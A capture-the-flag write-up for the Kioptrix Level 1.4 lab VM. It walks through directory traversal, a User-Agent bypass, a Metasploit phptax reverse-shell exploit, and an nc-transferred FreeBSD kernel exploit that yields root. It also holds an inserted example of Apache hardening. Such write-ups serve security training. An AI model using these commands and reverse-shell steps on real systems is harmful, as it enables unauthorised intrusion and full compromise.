VulnHub Writeup : Kioptrix Level 1.4 (#5)
Box Stats :

| | |
|---|---|
| Box Name | Kioptrix Level 1.4 |
| Release Date | 6 Apr 2014 |
The IP of the target VM is 192.168.1.159. Perform an nmap scan on the target:
```
$ nmap -sV --top-ports 1000 192.168.1.159 -oN nmap.txt
Starting Nmap 7.91 ( https://nmap.org ) at 2021-10-26 16:38 EDT
Nmap scan report for 192.168.1.159
Host is up (0.00050s latency).
Not shown: 997 filtered ports
PORT     STATE  SERVICE VERSION
22/tcp   closed ssh
80/tcp   open   http    Apache httpd 2.2.21 ((FreeBSD) mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8)
8080/tcp open   http    Apache httpd 2.2.21 ((FreeBSD) mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 30.54 seconds
```
As we can see, ports 80 and 8080 are open. The web server on port 80 only shows the default "It works!" message, but the page source contains a commented-out part pointing to a pChart link: http://192.168.1.159/pchart2.1.3/index.php. So a pChart application is hosted on port 80.
A Google search shows that pChart 2.1.3 has XSS and directory traversal vulnerabilities, and the directory traversal can be exploited by accessing the link below.

At this point we cannot do much with this vulnerability, so let's check port 8080.
It says access forbidden. But we can read the Apache httpd.conf file through the directory traversal vulnerability. Since we also know the OS is FreeBSD, the httpd.conf file should be located at /usr/local/etc/apache2x/httpd.conf, so let's try to access it.
The picture above shows the last lines of the httpd.conf file, which indicate that the web server checks the browser's User-Agent header: only a user agent of Mozilla/4.0 is allowed to access the application running on port 8080.
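As an added illustration (not the page's own material and not the box's actual httpd.conf, which appears only in the picture), this is how such a User-Agent gate is typically written in Apache 2.2 syntax, next to a variant that does not depend on a client-supplied header; the directory path, network range and htpasswd path are assumed.

```apache
# Assumed illustration, not the box's real configuration.
# Gating a directory on the User-Agent header: the client chooses
# this header, so the check is a fingerprint hint, not access control.
<Directory "/usr/local/www/apache22/data2">
    SetEnvIf User-Agent "^Mozilla/4\.0" allowed_ua
    Order Deny,Allow
    Deny from all
    Allow from env=allowed_ua
</Directory>

# Hardened alternative: restrict by source network and require
# credentials. Satisfy defaults to All, so both must pass, and
# neither can be satisfied by editing a request header.
<Directory "/usr/local/www/apache22/data2">
    Order Deny,Allow
    Deny from all
    # assumed administrative network
    Allow from 192.168.1.0/24
    AuthType Basic
    AuthName "Restricted"
    # assumed path to an htpasswd file
    AuthUserFile /usr/local/etc/apache22/htpasswd
    Require valid-user
</Directory>
```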
So we have to change the browser user agent to Mozilla/4.0. For that we install the User Agent Switcher plugin in Firefox and add the user agent Mozilla/4.0 (compatible; Intel Mac OS X 10.6; rv:2.0b8) Gecko/20100101 Firefox/4.0b8) as Kioptrix5. Now enable the custom user agent and access the service running on port 8080.
The phptax app is hosted at http://192.168.1.159:8080/phptax/. A Google search shows that phptax has a remote code execution vulnerability, and there is also a Metasploit module available for it, so we are going to use Metasploit.
```
msf6 > use exploit/multi/http/phptax_exec
msf6 exploit(multi/http/phptax_exec) > set RHOSTS 192.168.1.159
RHOSTS => 192.168.1.159
msf6 exploit(multi/http/phptax_exec) > set RPORT 8080
RPORT => 8080
msf6 exploit(multi/http/phptax_exec) > set payload cmd/unix/reverse
payload => cmd/unix/reverse
msf6 exploit(multi/http/phptax_exec) > set lhost 192.168.1.6
lhost => 192.168.1.6
msf6 exploit(multi/http/phptax_exec) > exploit
[*] Started reverse TCP double handler on 192.168.1.6:4444
[*] 192.168.1.159:8080 - Sending request...
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo y6th2VULrYqot44x;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Command: echo jVPGdJKnv4d3Y4jP;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket A
[*] A: "Connected: not found\r\nEscape: not found\r\njVPGdJKnv4d3Y4jP\r\n"
[*] Reading from socket B
[*] B: "y6th2VULrYqot44x\r\n"
[*] Matching...
[*] A is input...
[*] Matching...
[*] B is input...
[*] Command shell session 1 opened (192.168.1.6:4444 -> 192.168.1.159:25038) at 2021-10-27 16:06:00 -0400
[*] Command shell session 2 opened (192.168.1.6:4444 -> 192.168.1.159:35833) at 2021-10-27 16:06:00 -0400

whoami
www
id
uid=80(www) gid=80(www) groups=80(www)
uname -a
FreeBSD kioptrix2014 9.0-RELEASE FreeBSD 9.0-RELEASE #0: Tue Jan 3 07:46:30 UTC 2012 firstname.lastname@example.org:/usr/obj/usr/src/sys/GENERIC amd64
```
Now for privilege escalation: there is a kernel exploit for FreeBSD 9.0 available on Exploit-DB. First download the exploit to the attacker machine, then transfer the exploit code to the target machine, compile it, and run it there. We are going to use nc to send the exploit to the target machine:
```
wget https://www.exploit-db.com/download/26368 -O exploit.c
nc -lvvp 8888 < exploit.c
```
The nc listener is now listening on port 8888. To download the file on the target machine, just connect to the attacker machine with:

```
nc 192.168.1.6 8888 > exploit.c
```
It may take a few seconds to download; then compile and run the exploit:
```
gcc exploit.c -o exploit
exploit.c:89:2: warning: no newline at end of file
./exploit
id
uid=0(root) gid=0(wheel) egid=80(www) groups=80(www)
whoami
root
```
And as we can see, we now have root access to the machine.